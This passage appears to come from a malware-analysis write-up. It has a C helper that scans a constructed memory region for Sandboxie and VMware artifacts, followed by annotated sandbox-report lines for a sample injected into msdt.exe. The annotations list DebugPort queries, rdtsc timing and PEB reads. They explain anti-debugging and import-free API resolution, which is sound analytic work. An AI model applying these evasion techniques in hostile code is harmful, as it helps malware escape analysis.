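/* Constructed stand-in for a dump region (not bytes from the report's dumps):
 * a UTF-16LE "SBIEDLL.DLL" as a .NET string literal would appear, some filler,
 * then the ASCII VMware Tools path quoted in the report. */
size_t build_constructed_dump(uint8_t *out, size_t cap)
{
    static const char utf16_src[] = "SBIEDLL.DLL";
    static const char ascii_src[] =
        "InstallPath=C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\";
    size_t need = 2 * (sizeof utf16_src - 1) + 8 + (sizeof ascii_src - 1);
    if (cap < need) return 0;
    size_t n = 0;
    for (size_t i = 0; i < sizeof utf16_src - 1; i++) {
        out[n++] = (uint8_t)utf16_src[i];
        out[n++] = 0;                     /* UTF-16LE high byte */
    }
    memset(out + n, 0xCC, 8);             /* unrelated filler bytes */
    n += 8;
    memcpy(out + n, ascii_src, sizeof ascii_src - 1);
    n += sizeof ascii_src - 1;
    return n;
}

/* Builds the constructed region and scans it; returns the hit mask. */
unsigned scan_constructed_dump(void)
{
    uint8_t buf[256];
    size_t n = build_constructed_dump(buf, sizeof buf);
    return scan_for_sandbox_artifacts(buf, n);
}

int main(void)
{
    unsigned h = scan_constructed_dump();
    printf("sandboxie=%d wine=%d vmware=%d\n",
           !!(h & HIT_SANDBOXIE), !!(h & HIT_WINE), !!(h & HIT_VMWARE));
    return 0;
}
```

The constructed region yields Sandboxie and VMware hits and no Wine hit; an ASCII-only scanner (stride 1 alone) would report only the VMware path and miss SBIEDLL.DLL entirely, which is the mistake this example is meant to prevent when triaging dumps of .NET loaders.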
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe; Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe; Process queried: DebugPort
          Note: querying DebugPort is NtQueryInformationProcess with the ProcessDebugPort class; a non-zero result means a debugger is attached. It is the usual companion to reading the PEB BeingDebugged flag, and it runs both in the original process and in the injected msdt.exe.
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe; Code function: 2_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe; Code function: 2_2_0040ACC0 LdrLoadDll
          Source: C:\Windows\SysWOW64\msdt.exe; Code functions that read the PEB pointer with mov eax, dword ptr fs:[00000030h] (reads into ecx are noted separately), with the number of such reads in each function. In a 32-bit process, which this SysWOW64 msdt.exe is, fs:[30h] is the TEB's pointer to the PEB; the PEB holds the BeingDebugged and NtGlobalFlag fields and the Ldr module lists, so these reads underpin both the debugger checks and the import-free API resolution that injected code relies on:
          6_2_0508E539 (1)
          6_2_0504A537 (1)
          6_2_05098D34 (1)
          6_2_05003D43 (1)
          6_2_05043540 (1)
          6_2_04FD849B (1)
          6_2_04FE746D (1)
          6_2_050905AC (2)
          6_2_04FFA44B (1)
          6_2_05046DC9 (5 into eax, 1 into ecx)
          6_2_04FFBC2C (1)
          6_2_0508FDE2 (4)
          6_2_05078DF1 (1)
          6_2_0509740D (3)
          6_2_05081C06 (14)
          6_2_05046C0A (4)
          6_2_04FDD5E0 (2)
          6_2_04FF1DB5 (3)
          6_2_0505C450 (2)
          6_2_04FF35A1 (1)
          6_2_04FFFD9B (2)
          6_2_04FC2D8A (5)
          6_2_04FF2581 (4)
          6_2_04FEC577 (2)
          6_2_04FE7D50 (1)
          6_2_04FF4D3B (3)
          6_2_04FD3D34 (13)
          6_2_04FCAD30 (1)
          6_2_05098CD6 (1)
          6_2_050814FB (1)
          6_2_05046CF0 (3)
          6_2_0509070D (2)
          6_2_0505FF10 (2)
          6_2_04FF16E0 (1, into ecx)
          6_2_04FD76E2 (1)
          6_2_04FF36CC (1)
          6_2_05098F6A (1)
          6_2_04FEAE73 (5)
          6_2_04FD766D (1)
          6_2_05047794 (3)
          6_2_04FD7E41 (6)
          6_2_04FCE620 (1)
          6_2_04FFA61C (2)
          6_2_050037F5 (1)
          6_2_04FCC600 (3)
          6_2_04FF8E00 (1)
          6_2_05081608 (1)
          6_2_0507FE3F (1)
          6_2_0508AE44 (2)
          6_2_04FD8794 (1)
          6_2_0505FE87 (1)
          6_2_04FDFF60 (1)
          6_2_050446A7 (1)
          6_2_05090EA5 (3)
          6_2_04FDEF40 (1)
          6_2_0507FEC0 (1)
          6_2_05008EC7 (1)
          6_2_04FFE730 mov eax,